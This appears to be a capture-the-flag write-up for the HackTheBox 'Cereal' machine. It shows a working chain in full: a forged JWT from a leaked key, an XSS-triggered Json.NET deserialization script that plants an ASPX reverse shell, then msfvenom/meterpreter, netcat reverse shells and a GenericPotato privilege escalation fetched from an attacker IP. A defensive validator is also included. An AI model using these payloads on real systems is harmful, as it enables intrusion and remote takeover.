Basic information

Port scan

22,80,443:

$ nmap -sC -sV 10.10.10.217
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 16:24 CST
Nmap scan report for 10.10.10.217
Host is up (0.076s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 08:8e:fe:04:8c:ad:6f:df:88:c7:f3:9a:c5:da:6d:ac (RSA)
| 256 fb:f5:7b:a1:68:07:c0:7b:73:d2:ad:33:df:0a:fc:ac (ECDSA)
|_ 256 cc:0e:70:ec:33:42:59:78:31:c0:4e:c2:a5:c9:0e:1e (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://10.10.10.217/
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Cereal
| ssl-cert: Subject: commonName=cereal.htb
| Subject Alternative Name: DNS:cereal.htb, DNS:source.cereal.htb
| Not valid before: 2020-11-11T19:57:18
|_Not valid after: 2040-11-11T20:07:19
|_ssl-date: 2021-01-18T08:25:57+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.75 seconds

80/443

Visiting the IP directly redirects to 443 (https), and a login is required:

source.cereal.htb

The scan result above lists a subdomain in the certificate's Subject Alternative Name; add it to the hosts file and visit it:

git leak

A git leak is easy to find, so dump it and analyse the code:

JWT key

The git log shows a "security fix" commit, so roll back to the previous version:

git reset --hard 8f2a1a88f15b9109e1f63e4e4551727bfb38eee5

A hardcoded JWT key is found in Services/UserService.cs:

var key = Encoding.ASCII.GetBytes("secretlhfIH&FY*#oysuflkhskjfhefesf");

Deserialization

Deserialization is also found in Controllers\RequestsController.cs:

XSS

There is an XSS in ClientApp\src\AdminPage\AdminPage.jsx:

Exploit chain

The idea is to use the XSS to trigger the deserialization.

exploit

Generate a JWT

  • https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -b -S hs256 -p 'secretlhfIH&FY*#oysuflkhskjfhefesf' $(echo -n '{"alg":"HS256","typ":"JWT"}' | base64).$(echo -n '{"name": "1", "exp":' `date -d "+7 days" +%s`} | base64 -w0).

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiMSIsImV4cCI6MTYxMTI1MjY2NH0.FgxODspIu3yNTBepPeOCqxA8eAFPIFPox0AmAhzSLgU

C# serialization

  • https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
using System;
using Newtonsoft.Json;

// Build the gadget object and serialize it with type information included, so
// that Json.NET can reconstruct the concrete type when it deserializes the string.
Cereal.DownloadHelper dh = new Cereal.DownloadHelper
{
    URL = "https://someurl/pic.png",
    FilePath = "pic.png",
};

string json = JsonConvert.SerializeObject(dh, new JsonSerializerSettings
{
    TypeNameHandling = TypeNameHandling.All
});
Console.WriteLine(json);

// output (from the author's run; URL and FilePath differ from the sample values above)
{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://10.10.14.11:7777/shell.aspx","FilePath":"c:/inetpub/source/uploads/shell.aspx"}

exp.py

import base64

import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# The box uses a self-signed certificate, so TLS verification is disabled below.
urllib3.disable_warnings(category=InsecureRequestWarning)

jwt_token = '<token>'   # token forged with the leaked HS256 key
my_ip = '<ip>'          # host serving shell.aspx

URL = 'https://cereal.htb/requests'

# JavaScript that runs in the admin's browser: it POSTs the DownloadHelper
# object to /requests with the admin's token, then GETs the created request
# by id so that the server deserializes it.
js_payload = """var jwt_token = '""" + jwt_token + """';
targeturl = 'https://cereal.htb/requests';

req = new XMLHttpRequest;
var payload = JSON.stringify({"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://""" + my_ip + """/shell.aspx","FilePath":"C:/inetpub/source/uploads/shell.aspx"}'});

req.onreadystatechange = function() {
    if (req.readyState == 4) {
        var id = JSON.parse(this.responseText).id;

        req2 = new XMLHttpRequest;
        req2.open('GET', targeturl + "/" + id, false);
        req2.setRequestHeader("Authorization", "Bearer " + jwt_token);
        req2.send();
    }
}
req.open('POST', targeturl, false);
req.setRequestHeader("Authorization", "Bearer " + jwt_token);
req.setRequestHeader('Content-type', 'application/json');
req.send(payload);"""

# The markdown-style link in the title is the XSS trigger in AdminPage.jsx; it
# carries the script above base64-encoded inside a javascript: URL.
js_payload_b64 = base64.b64encode(js_payload.encode('utf-8')).decode('utf-8')
payload = {'json': '{"title":"[XSS](javascript: eval(atob(%22' + js_payload_b64 + '%22%29%29)", "flavor":"x", "color":"#FFF", "description":"x"}'}
headers = {'Authorization': 'Bearer ' + jwt_token}

print("sending payload: " + str(payload))
r = requests.post(URL, headers=headers, json=payload, verify=False)
print(r.text)
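Server-side validation for the /requests endpoint that rejects the two primitives this chain depends on (a markdown link whose target is not http(s), and Json.NET's "$type" discriminator anywhere in the submitted JSON, including inside base64 handed to atob()), as an added example that is not code from the writeup or the Cereal project. It assumes Node.js with no external packages; the request shape follows exp.py, and both sample bodies are constructed.

```javascript
const ALLOWED_LINK_SCHEMES = new Set(['http', 'https']);

// Targets of markdown links "[text](target)", read up to ')' or whitespace.
function badLinkTargets(text) {
  const bad = [];
  for (const m of text.matchAll(/\[[^\]]*\]\(\s*([^)\s]*)/g)) {
    const target = m[1].replace(/[\u0000-\u0020]/g, '');   // ignore control chars before the scheme
    const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(target);
    if (scheme && !ALLOWED_LINK_SCHEMES.has(scheme[1].toLowerCase())) bad.push(m[1]);
  }
  return bad;
}

// Base64 literals handed to atob(), quoted directly or as %22 like the payload above.
function atobLiterals(text) {
  return [...text.matchAll(/atob\(\s*(?:%22|["'])([A-Za-z0-9+/=]+)/g)]
    .map((m) => Buffer.from(m[1], 'base64').toString('utf8'));
}

// Json.NET's polymorphic type discriminator; user input never legitimately needs it.
const hasTypeDiscriminator = (text) => /"\$type"\s*:/.test(text);

// body is the parsed POST body: { json: "<stringified request object>" }.
function inspectRequest(body) {
  const reasons = [];
  const inner = typeof body.json === 'string' ? body.json : JSON.stringify(body.json || {});
  if (hasTypeDiscriminator(inner)) reasons.push('$type in json');
  for (const t of badLinkTargets(inner)) reasons.push(`link scheme: ${t}`);
  for (const js of atobLiterals(inner)) {
    if (hasTypeDiscriminator(js)) reasons.push('$type in atob payload');
    if (badLinkTargets(js).length) reasons.push('link scheme in atob payload');
  }
  return { accepted: reasons.length === 0, reasons };
}

// Constructed samples: the shape exp.py sends (with a placeholder host) and a benign request.
const INNER_JS = 'var payload = JSON.stringify({"json": \'{"$type":"Cereal.DownloadHelper, Cereal",' +
  '"URL":"http://203.0.113.5/x","FilePath":"x"}\'});';
const SAMPLE_XSS_BODY = {
  json: '{"title":"[XSS](javascript: eval(atob(%22' + Buffer.from(INNER_JS).toString('base64') +
    '%22%29%29)", "flavor":"x", "color":"#FFF", "description":"x"}',
};
const SAMPLE_CLEAN_BODY = {
  json: '{"title":"[see docs](https://cereal.htb/docs)", "flavor":"x", "color":"#FFF", "description":"x"}',
};

console.log(inspectRequest(SAMPLE_XSS_BODY), inspectRequest(SAMPLE_CLEAN_BODY));
```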

exploit

python -m SimpleHTTPServer 7777
python3 exp.py
rlwrap nc -lvvp 4445

# wait until the HTTP request for shell.aspx arrives, then request the page to trigger the shell
curl -k https://source.cereal.htb/uploads/shell.aspx

user flag

The shell runs as user sonny; user.txt is on that user's desktop:

Information gathering

netstat

The listening ports include an 8080:

netstat -aon | findstr /i "listening"
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 1664
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 892
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8172 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 496
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 508
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1096
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 636
TCP 0.0.0.0:49675 0.0.0.0:0 LISTENING 648
TCP 10.10.10.217:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:49668 0.0.0.0:0 LISTENING 3416
TCP 127.0.0.1:49671 0.0.0.0:0 LISTENING 3704
TCP [::]:22 [::]:0 LISTENING 1664
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 892
TCP [::]:443 [::]:0 LISTENING 4
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 4
TCP [::]:8172 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 496
TCP [::]:49665 [::]:0 LISTENING 508
TCP [::]:49666 [::]:0 LISTENING 1096
TCP [::]:49667 [::]:0 LISTENING 636
TCP [::]:49675 [::]:0 LISTENING 648
TCP [::1]:49668 [::]:0 LISTENING 3416

whoami

whoami shows that SeImpersonatePrivilege is enabled:

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

meterpreter

For convenience, load a meterpreter:

# local
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4446 -b "\x00\x0a" -a x64 --platform windows -f exe -o miao.exe

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.18
set LPORT 4446
run

# target
mkdir C:\temp
cd C:\temp
curl http://10.10.14.18:7777/miao.exe -o C:\temp\miao.exe
.\miao.exe

portfwd

Forward port 8080 out:

portfwd add -l 8081 -p 8080 -r 127.0.0.1

Visiting local port 8081 is then the same as visiting port 8080 on the target:

GraphQL

It turns out to be GraphQL:

Enumeration shows a callable updatePlant function, which can be used for SSRF.

exploit

SSRF + SeImpersonatePrivilege: juicy potato over HTTP:

curl http://10.10.14.18:7777/nc64.exe -o C:\temp\nc64.exe
curl http://10.10.14.18:7777/GenericPotato.exe -o C:\temp\GenericPotato.exe
curl http://10.10.14.18:7777/NtApiDotNet.xml -o C:\temp\NtApiDotNet.xml
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.18 4447 -e powershell" -e HTTP -l 8889
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "<my_ip> 9005 -e powershell" -e HTTP -l 8889

rlwrap nc -lvvp 4447

curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"http://localhost:8889\")}"}' 'http://localhost:8081/api/graphql'

root flag

root.txt is then on the Administrator user's desktop:

References